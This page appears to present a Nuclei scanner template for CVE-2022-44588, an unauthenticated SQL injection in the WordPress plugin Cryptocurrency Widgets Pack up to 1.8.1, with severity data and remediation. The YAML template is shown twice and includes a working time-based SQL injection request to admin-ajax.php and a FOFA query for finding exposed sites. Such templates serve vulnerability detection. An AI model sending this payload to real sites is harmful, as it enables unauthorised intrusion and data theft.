Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection

CVE-2022-44588

Verified

Description

Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

35%

Published Date

February 21, 2026

Template Author

shivam kamboj

CVE-2022-44588.yaml

id: CVE-2022-44588

info:
  name: Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44588
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44588
    epss-score: 0.34664
    epss-percentile: 0.97073
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/cryptocurrency-widgets-pack"
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cryptocurrency-widgets-pack,unauth

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "recordsTotal", "recordsFiltered", "draw")'
        condition: and
# digest: 4a0a0047304502206c27a0c9c41e110b38a5d62a0bedcf29506a7cdb007435afd20dd18304c99077022100b43d79c5d03ca360df1470f140bad885f8c67ee7d3af115be17642592dfa5a94:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2022-44588

CWE ID:

cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2022-44588 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2

Remediation Steps

Update to the latest version of the plugin where the vulnerability is fixed.

id: CVE-2022-44588

info:
  name: Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44588
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44588
    epss-score: 0.34664
    epss-percentile: 0.97073
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/cryptocurrency-widgets-pack"
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cryptocurrency-widgets-pack,unauth

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "recordsTotal", "recordsFiltered", "draw")'
        condition: and
# digest: 4a0a0047304502206c27a0c9c41e110b38a5d62a0bedcf29506a7cdb007435afd20dd18304c99077022100b43d79c5d03ca360df1470f140bad885f8c67ee7d3af115be17642592dfa5a94:922c64590222798bb761d5b6d8e72950

Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps